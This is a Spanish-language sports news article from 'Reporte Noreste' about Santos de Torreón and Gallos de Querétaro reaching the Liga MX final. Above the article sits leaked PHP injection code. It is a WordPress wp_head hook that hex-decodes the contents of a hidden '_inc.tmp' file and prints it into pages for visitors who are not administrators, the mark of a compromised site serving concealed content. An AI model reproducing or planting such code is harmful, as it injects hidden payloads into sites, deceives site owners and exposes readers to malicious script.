if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Gallos y Santos son finalistas de la Liga mx – Reporte Noreste
Conéctate con nosotros

Los Santos de Torreón fueron los primeros en instalarse en la gran final del futbol mexicano, tras humillar al Guadalajara en su propia casa por marcador de 3 a 0, Tavares, Izquierdoz y Calderón sentenciaron a las chivas.

Los de la comarca se colaron a la fiesta grande de la Liga mx como octavo lugar, y con 4 anotaciones han logrado llegar a la final, en la espera de conquistar el título de la mano de Pedro Caixinha.

Por su parte los Gallos del Querétaro llegan por primera vez en la historia de la franquicia a una final del futbol mexicano, vencieron 2 a 0 (global 2-2) en el juego de vuelta a los Tuzos del Pachuca.

El “Rey Midas” Víctor Manuel Vucetich vuelve a una final, después de tomar las riendas a unos Gallos en la jornada 8 y con tan solo 5 puntos, ahora se enfila a lo que podría ser un nuevo título del balompié Nacional.

Los juegos de la gran final podrían ser los días jueves en Torreón y el domingo en Querétaro.

Foto/mipronosticodeportivo.com

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Más en Sin categoría